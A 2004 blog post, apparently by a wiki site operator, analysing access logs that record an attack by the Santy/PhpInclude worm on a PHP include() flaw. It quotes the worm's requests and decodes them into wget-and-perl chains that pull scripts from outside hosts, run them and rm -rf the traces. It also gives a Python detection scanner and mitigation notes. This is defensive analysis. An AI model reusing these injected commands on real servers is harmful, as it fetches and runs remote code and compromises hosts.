2004-12-27
[Security] An attack aimed at a PHP vulnerability?
Addendum (04/12/28): It turned out to be the worm known as Santy.C, Santy.E or PhpInclude.Worm. It exploits a vulnerability caused by improper use of include() / require(). Details of the vulnerability and the countermeasure are here. Checking the value before you include it is enough.
Addendum (04/12/30): allow_url_fopen = Off appears to deal with it.*1
Addendum (05/01/05): There seem to be problems with the above. See 個人的なメモと備忘録, "On the problems with the workaround of setting allow_url_fopen to Off". For countermeasures, see 個人的なメモと備忘録, "About the worm that infects PHP servers".
For the status of the PukiWiki fix, see PukiWiki-dev:BugTrack/771.
I wonder if this is aimed at a PHP vulnerability.
The source IPs vary, so the hosts sending the requests may themselves be victims.
The "oo" parts are masked.
oo.oo.ooo.ooo - - [26/Dec/2004:14:07:15 +0900] "GET /index.php?cmd=diff&page=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 301 - "-" "LWP::Simple/5.65"
Breaking the line after each ; and replacing %20 with a space gives this.
cd /tmp;
wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611111;
wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611113;
wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611114;
rm -rf sess_189f0f0889555397a4de5485dd611113.* sess_189f0f0889555397a4de5485dd611114.* sess_189f0f0889555397a4de5485dd611112.*;
cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/tmp/;
cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/spool/mail/;
cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/mail/;
cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /usr/local/apache/proxy/;
cd /var/tmp/;
perl sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611112;
cd /var/spool/mail/;
perl sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611112;
cd /var/mail/;
perl sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611112;
cd /usr/local/apache/proxy/;
perl sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611112;
rm -rf /tmp/sess_189f0f0889555397a4de5485dd611111* /var/tmp/sess_189f0f0889555397a4de5485dd611111* /var/spool/mail/sess_189f0f0889555397a4de5485dd611111* /var/mail/sess_189f0f0889555397a4de5485dd611111* /usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*
One more.
oo.oo.oo.oo - - [26/Dec/2004:10:35:55 +0900] "GET /index.php?cmd=diff&page=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 301 - "-" "LWP::Simple/5.803"
Processed the same way, it looks like this. This one does not seem to clean up after itself.
cd /tmp;
wget www.visualcoders.net/spybot.txt;
wget www.visualcoders.net/worm1.txt;
wget www.visualcoders.net/php.txt;
wget www.visualcoders.net/ownz.txt;
wget www.visualcoders.net/zone.txt;
perl spybot.txt;
perl worm1.txt;
perl ownz.txt;
perl php.txt
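As an added example (not from the original post), a small Python scanner that flags this request shape in Apache combined-format access logs and reproduces the decoding step above: a remote URL in page=, a second cmd= carrying a ';'-chained shell command, and the LWP::Simple user agent. The sample log lines, hosts and timestamps in it are constructed.

```python
import re
from urllib.parse import unquote
# Apache combined log format; hosts, times and payloads in SAMPLE_LOG are constructed
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
# A shell separator followed by one of the tools the worm chains together
SHELL_HINTS = re.compile(r'(;|&&|\|)\s*(cd|wget|curl|perl|rm|cp)\b')
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)

SAMPLE_LOG = [
    # Same shape as the worm request quoted above, with placeholder hosts
    '10.0.0.1 - - [26/Dec/2004:10:35:55 +0900] "GET /index.php?cmd=diff'
    '&page=http://dropper.invalid/spy.gif?&cmd=cd%20/tmp;wget%20dropper.invalid/worm1.txt;'
    'perl%20worm1.txt HTTP/1.1" 301 - "-" "LWP::Simple/5.803"',
    # An ordinary diff request for comparison
    '10.0.0.2 - - [26/Dec/2004:11:00:00 +0900] "GET /index.php?cmd=diff&page=FrontPage'
    ' HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
]

def query_params(target):
    # Split on '&' only and keep duplicate keys: the worm sends cmd=diff AND a second
    # cmd= carrying the payload, and the payload itself contains ';' (a parse_qsl pitfall)
    pairs = []
    for part in target.partition('?')[2].split('&'):
        key, _, value = part.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return pairs

def analyse(line):
    # Returns {'host', 'time', 'findings'} for a parsed line, None if it does not parse
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for key, value in query_params(m['target']):
        if key == 'page' and REMOTE_URL.match(value):
            findings.append('remote URL in page= (remote include attempt)')
        if SHELL_HINTS.search(value):
            findings.append(f'shell command chain in {key}=')
    if m['agent'].startswith('LWP::'):
        findings.append("LWP::Simple client (the worm's user agent)")
    return {'host': m['host'], 'time': m['time'], 'findings': findings}

def decoded_commands(line):
    # What the post does by hand: take the payload parameter and break it at ';'
    m = LOG_RE.match(line)
    for key, value in (query_params(m['target']) if m else []):
        if SHELL_HINTS.search(value):
            return [c.strip() for c in value.split(';') if c.strip()]
    return []
```

Run it over the real access log with `for line in open(path): r = analyse(line.rstrip('\n'))` and report the entries whose findings list is non-empty.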
Speculation follows.
- Make it include the GIF image (open → include)
- Arbitrary commands can now be run remotely
- Download the Perl scripts
- Run the Perl scripts
- Send the same request on to the next server
Possibly related information
- SecurityFocus HOME Mailing List: BugTraq
- vBulletin Community Forum - showthread attack attempt?
- vBulletin Community Forum - Security Warning - How they killed my vb
Being the honest type, for now I put the following in .htaccess or httpd.conf. The effect is little more than a placebo.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP.* [NC]
RewriteRule .* - [F]
Identity established. The latter appears to be a worm called Perl.Santy.C.
Here it is listed as PhpInclude.Worm or Santy.e.
Follow-up.